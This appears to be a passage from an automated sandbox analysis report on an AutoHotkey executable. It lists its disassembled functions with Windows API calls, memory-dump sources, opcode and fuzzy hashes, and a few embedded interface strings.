                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: IconImageList_$DeleteDestroyMaskedObjectReplaceSize
                                      • String ID:
                                      • API String ID: 1613341713-0
                                      • Opcode ID: fe1463ebc55d8ea28cd94c0f35790740bf8442e2befc5a37b58b8544447efd2b
                                      • Instruction ID: a5064abfee353a980abf435dd2dd6ce479ca477cdae80e2bf57e2614798589ec
                                      • Opcode Fuzzy Hash: fe1463ebc55d8ea28cd94c0f35790740bf8442e2befc5a37b58b8544447efd2b
                                      • Instruction Fuzzy Hash: 8041C1B19042129FC314DF69DC84A6BB7E9FB89315F148B2EF859C3241D734E819CBA6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004741A0 Relevance: 7.6, APIs: 5, Instructions: 118windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001304,00000000,00000000), ref: 004741BA
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004741F2
                                      • SendMessageW.USER32(?,0000130C,-00000001,00000000), ref: 00474236
                                      • GetDlgCtrlID.USER32 ref: 00474252
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$Ctrl
                                      • String ID:
                                      • API String ID: 4210937766-0
                                      • Opcode ID: ffdff617bcee6b181f7d7581485404b42f8bd52d268a8072be311176732e6f0d
                                      • Instruction ID: da1c7568fc3642a3a5f9211162673405ccf37517d94f2375e71d74ea23fe143b
                                      • Opcode Fuzzy Hash: ffdff617bcee6b181f7d7581485404b42f8bd52d268a8072be311176732e6f0d
                                      • Instruction Fuzzy Hash: 99312630204215AAD320DA699C44FF7BBD8EBD5345F04CAABF949C62D3C768DC94CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00468728 Relevance: 7.6, APIs: 5, Instructions: 77windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000030,?,00000000), ref: 0046874D
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0046879D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: bf05ac34ab9d7b8855efff3d31d918287ee5090fd278eb4bde3c52322801d732
                                      • Instruction ID: 905cc7877eea1809b3e5f3d729afcdc06bdbae92ef4708ed8b72fc4c07fb8867
                                      • Opcode Fuzzy Hash: bf05ac34ab9d7b8855efff3d31d918287ee5090fd278eb4bde3c52322801d732
                                      • Instruction Fuzzy Hash: B5214474340344BBE734DE55CC92FB67366BB94B05F24460EF6415B2D1D6F8F8428A19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004735C0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00471500: GetWindowLongW.USER32(00000000,000000F0), ref: 00471540
                                        • Part of subcall function 00471500: GetWindowLongW.USER32(00000000,000000F0), ref: 0047156E
                                      • GetParent.USER32 ref: 004735E7
                                      • CheckRadioButton.USER32(00000000,000003FD,?,-00000004), ref: 00473602
                                      • SendMessageW.USER32(00000400,000000F1,00000000,00000000), ref: 0047364A
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00473657
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00473666
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: LongWindow$ButtonCheckMessageParentRadioSend
                                      • String ID:
                                      • API String ID: 3848393323-0
                                      • Opcode ID: 185c66117efbf54dc1357566d2ab16d1dac70c230b1256e8052c89985bd991ea
                                      • Instruction ID: f0e59cfb6d8b620f885750d8e77c1d2cf47aaa9a8a40e5c22e9dec3924558f78
                                      • Opcode Fuzzy Hash: 185c66117efbf54dc1357566d2ab16d1dac70c230b1256e8052c89985bd991ea
                                      • Instruction Fuzzy Hash: 0E21D872104301ABC724CF04DC44EFBB769EBD5362F248A1EF15693250DB35B9458764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E430 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0040E43E
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • _malloc.LIBCMT ref: 0040E463
                                      • _free.LIBCMT ref: 0040E472
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _malloc$AllocateHeap_free
                                      • String ID:
                                      • API String ID: 1159278337-0
                                      • Opcode ID: 3cf02fe0e109417ad098516ae6369afaf6036c3caca03eb40df4fb2db329b05c
                                      • Instruction ID: b51a74af510d3b6b56f33704df969146ad01979f218eebb2d6745bc0f4d6d6ac
                                      • Opcode Fuzzy Hash: 3cf02fe0e109417ad098516ae6369afaf6036c3caca03eb40df4fb2db329b05c
                                      • Instruction Fuzzy Hash: A111E9B290131867C610AF96BC81A9B779CD785714F04043FF904D7312E73DAD16C6EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0049A1C7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0049A1D5
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • _free.LIBCMT ref: 0049A1E8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free_malloc
                                      • String ID:
                                      • API String ID: 1020059152-0
                                      • Opcode ID: 32b43eae5c8bfd2fff1b8a9e9a5a4d8a27b3690e070ef586cb8521668824c2e0
                                      • Instruction ID: a88ae2ba1fc1c1623b1a14dd7898c3e73e7a047b7466f3b79303f404fb57a078
                                      • Opcode Fuzzy Hash: 32b43eae5c8bfd2fff1b8a9e9a5a4d8a27b3690e070ef586cb8521668824c2e0
                                      • Instruction Fuzzy Hash: 1D11E332404225ABCF216F76AC0565A3F98EF857B4F20447BF8458A350EE3D88A096DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004684B5 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00468001
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004684F1
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00468504
                                      • SendMessageW.USER32(00000000,00001330,-00000001,00000000), ref: 0046851D
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046852C
                                        • Part of subcall function 00473F30: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00473F47
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow_free
                                      • String ID:
                                      • API String ID: 3510866790-0
                                      • Opcode ID: a27e4297ff281b82ea0c4cc32550fbcdf3daeb8faf806c3732e15bfa471d373c
                                      • Instruction ID: 0bf2012d0b4982e269b132e40de8a6930dd731ddddaf9ea88e08b40ea27f0a15
                                      • Opcode Fuzzy Hash: a27e4297ff281b82ea0c4cc32550fbcdf3daeb8faf806c3732e15bfa471d373c
                                      • Instruction Fuzzy Hash: 4911E171644300ABD7209F24DC91F6B73A0AB88750F184A2FF6465B3C1EA79E802CB5F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045F490 Relevance: 7.5, APIs: 5, Instructions: 37windowtimethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(00000000,00000010,00000000,00000000,00000002,000001F4,?), ref: 0045F4A9
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 0045F4BD
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0045F4D3
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0045F4E2
                                      • CloseHandle.KERNEL32(00000000), ref: 0045F4E9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Process$CloseHandleMessageOpenSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 1181120299-0
                                      • Opcode ID: fd24dd855da6abb827fbe89ceda92be1dcf58c868dac5fe99dbedf2cd40ec21a
                                      • Instruction ID: 15c9d1062631f657d706d60885cce7d538b6b22aa3fca04ec5e159e1accac26b
                                      • Opcode Fuzzy Hash: fd24dd855da6abb827fbe89ceda92be1dcf58c868dac5fe99dbedf2cd40ec21a
                                      • Instruction Fuzzy Hash: 80F05471A413117BE3315B24DC0AFDB3A98AF16B12F444139FB06E61D0E7B4990886AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045C330 Relevance: 7.5, APIs: 5, Instructions: 35serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008), ref: 0045C346
                                      • LockServiceDatabase.ADVAPI32(00000000), ref: 0045C353
                                      • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0045C35E
                                      • GetLastError.KERNEL32 ref: 0045C366
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0045C379
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Service$Database$CloseErrorHandleLastLockManagerOpenUnlock
                                      • String ID:
                                      • API String ID: 2828566434-0
                                      • Opcode ID: 347b68e9fb296e131daa2c56abeec1165bb8f146e22d841f60d9ac9fbb705572
                                      • Instruction ID: 10738a6c9d74aa69020d11223a310c944258f216e00e2eb55fb04efa4bd6b32d
                                      • Opcode Fuzzy Hash: 347b68e9fb296e131daa2c56abeec1165bb8f146e22d841f60d9ac9fbb705572
                                      • Instruction Fuzzy Hash: 62F02771A453106BE7300B60DCC8F8B3AACBF97752F044032FD06E66A1C768C98A836D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00457620 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 479COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsncpy.LIBCMT ref: 004576BA
                                      • GetTickCount.KERNEL32 ref: 004579B7
                                        • Part of subcall function 00401060: IsClipboardFormatAvailable.USER32(0000000D), ref: 00401072
                                        • Part of subcall function 00401060: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040107A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardFormat$CountTick_wcsncpy
                                      • String ID: 6Dd
                                      • API String ID: 4241739539-23949168
                                      • Opcode ID: a1b965ba8832c69e931a63af42cc6ee7d44c70a86a74f5f7a50f6f65ab074722
                                      • Instruction ID: 97b756a1670dd2c7cc73280cc5cc395c9aa1e7884b5bb37323777fc795b0ef27
                                      • Opcode Fuzzy Hash: a1b965ba8832c69e931a63af42cc6ee7d44c70a86a74f5f7a50f6f65ab074722
                                      • Instruction Fuzzy Hash: 8912BE70509641DFC714DF18E884A6AB7E1FF89315F18857FE8858B362C338E859CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004373E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 340COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00437455
                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      • _free.LIBCMT ref: 00437513
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID: Next
                                      • API String ID: 776569668-2753412866
                                      • Opcode ID: 3834bbd638aa4e0deee49625f310476f98c741c1bcc1245d879d771558a17012
                                      • Instruction ID: 80bd094af14a219890b64ef1343576baf68652b163ed81be889dba935f0447b5
                                      • Opcode Fuzzy Hash: 3834bbd638aa4e0deee49625f310476f98c741c1bcc1245d879d771558a17012
                                      • Instruction Fuzzy Hash: 02D167B1A0C3408FD724DF58C884AABB7E4BB88314F24592EE5C987350D779E945CB9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D140 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 169COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick
                                      • String ID: #Bd
                                      • API String ID: 536389180-1306175853
                                      • Opcode ID: 792ec2915f4415faa546e148d1c40febad845dbc11033f09b2e8436620834592
                                      • Instruction ID: edbc99c02ac19fc78bc74d3e04e1fc1523ca7583ff097de426994b31e779df8a
                                      • Opcode Fuzzy Hash: 792ec2915f4415faa546e148d1c40febad845dbc11033f09b2e8436620834592
                                      • Instruction Fuzzy Hash: 1751902692F3C4D9E7268B78B854396BFD0DB26254F1C85EFD0C4826E2C679488CD35E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00439400 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • GetTickCount.KERNEL32 ref: 004394F1
                                      Strings
                                      • ---- %s, xrefs: 0043952C
                                      • Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after , xrefs: 0043940B
                                      • Press [F5] to refresh., xrefs: 004395D2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick_vswprintf_s
                                      • String ID: Press [F5] to refresh.$---- %s$Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after
                                      • API String ID: 1349412622-1384135373
                                      • Opcode ID: 53ceacdc311810843086e4f1f5d1fb2967f8c12afb02a8a38e5fc87a312c3c3c
                                      • Instruction ID: 0fb922e1197428dc13726195255b8e70b1187e0faa9a6f229a835af1bc25c0c1
                                      • Opcode Fuzzy Hash: 53ceacdc311810843086e4f1f5d1fb2967f8c12afb02a8a38e5fc87a312c3c3c
                                      • Instruction Fuzzy Hash: D451F4719083029FC711DF3CD9846AAB7D0AB89314F14463FE885D3394EA78DD49CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                      Download Yara Rule
                                      APIs
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 0040A029
                                      • GetTickCount.KERNEL32 ref: 0040A042
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CallCountHookNextTick
                                      • String ID: #Bd
                                      • API String ID: 3618830134-1306175853
                                      • Opcode ID: ed7ca4a7f8a25356a165abc5345642ec52d1a42171cf5cde4ad9a2a5b234f11e
                                      • Instruction ID: eb866e0ec2d259414f8e89a20662185a990945b0748801cb2fdba669bf047b57
                                      • Opcode Fuzzy Hash: ed7ca4a7f8a25356a165abc5345642ec52d1a42171cf5cde4ad9a2a5b234f11e
                                      • Instruction Fuzzy Hash: 514184212093419BD314CF289885B6BBBD99BA5710F18843FF585E72D2C2389C59D7AB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00428286 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: +-^RASHNOT$Parameter #1 invalid.$Parameter #3 invalid.
                                      • API String ID: 2691759472-20153427
                                      • Opcode ID: a6a2d6642a7a0d262e50a154210f537175b48d2e1a9366c736b68eeb1e09ce9e
                                      • Instruction ID: eacebe60420a4a97463f85b07ad35070ff699494fb077e1b02f8d6af1b49fb8e
                                      • Opcode Fuzzy Hash: a6a2d6642a7a0d262e50a154210f537175b48d2e1a9366c736b68eeb1e09ce9e
                                      • Instruction Fuzzy Hash: 9041CE347083619BEB34CB1AE4447A7B7E1AB91314F88489FE88587392D73D9C81C76A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00453170 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00453292
                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ErrorFreeHeapLast_free
                                      • String ID: Count$array$object
                                      • API String ID: 1353095263-899595868
                                      • Opcode ID: d82bf3b8c3f4cc27a59d26d30b7eeedab424b4b24eb2eb057b15d5835d2d336b
                                      • Instruction ID: 16ef5a3fce10a8048d628a22dc6bf0af1ba296d7381e94402d4b584ca40aac03
                                      • Opcode Fuzzy Hash: d82bf3b8c3f4cc27a59d26d30b7eeedab424b4b24eb2eb057b15d5835d2d336b
